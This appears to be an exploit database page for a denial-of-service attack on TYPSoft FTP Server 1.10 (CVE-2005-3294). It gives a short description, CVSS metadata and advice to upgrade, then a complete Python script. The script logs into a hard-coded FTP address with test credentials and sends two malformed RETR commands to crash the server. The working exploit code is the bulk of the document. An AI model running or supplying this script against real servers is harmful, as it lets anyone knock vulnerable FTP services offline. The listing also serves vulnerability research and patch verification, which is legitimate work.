TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service

vendor:

TYPSoft FTP Server

by:

Emanuele Gentili

7,5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: TYPSoft FTP Server

Affected Version From: 1.10

Affected Version To: 1.10

Patch Exists: YES

Related CWE: CVE-2005-3294, OSVDB 19992

CPE: typsoft_ftp_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2010

TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service

This exploit causes a denial of service in TYPSoft FTP Server version 1.10. It sends two RETR commands with a buffer of 0x41 to the server, causing it to crash.

Mitigation:

Upgrade to the latest version of TYPSoft FTP Server, or use an alternative FTP server.

Source

Exploit-DB raw data:

#!/usr/bin/python
#
# TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service
#
# CVE-2005-3294
# OSVDB 19992
#
# 12/23/2010
# (C) Emanuele Gentili <emgent@backtrack-linux.org>
#
# Notes:
# I have wrote this exploit because the code published here (1) do not work correctly.
# (1) http://www.exploit-db.com/exploits/12604/
#

import socket
import sys

user="test"
pwd="test"
buffer="\x41"

print("\n TYPSoft FTP Server (V 1.10) RETR CMD Denial Of Service\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.109",21))
data = s.recv(1024)
print("[+] Sending user login...")
s.send("USER " + user + '\r\n')
data = s.recv(1024)
s.send("PASS " + pwd + '\r\n')
data = s.recv(1024)
print("[+] Sending first exploit stage...")
s.send("RETR " + buffer + '\r\n')
data = s.recv(1024)
print("[+] Sending second exploit stage...\n")
s.send("RETR " + buffer + '\r\n')
data = s.recv(1024)
s.close()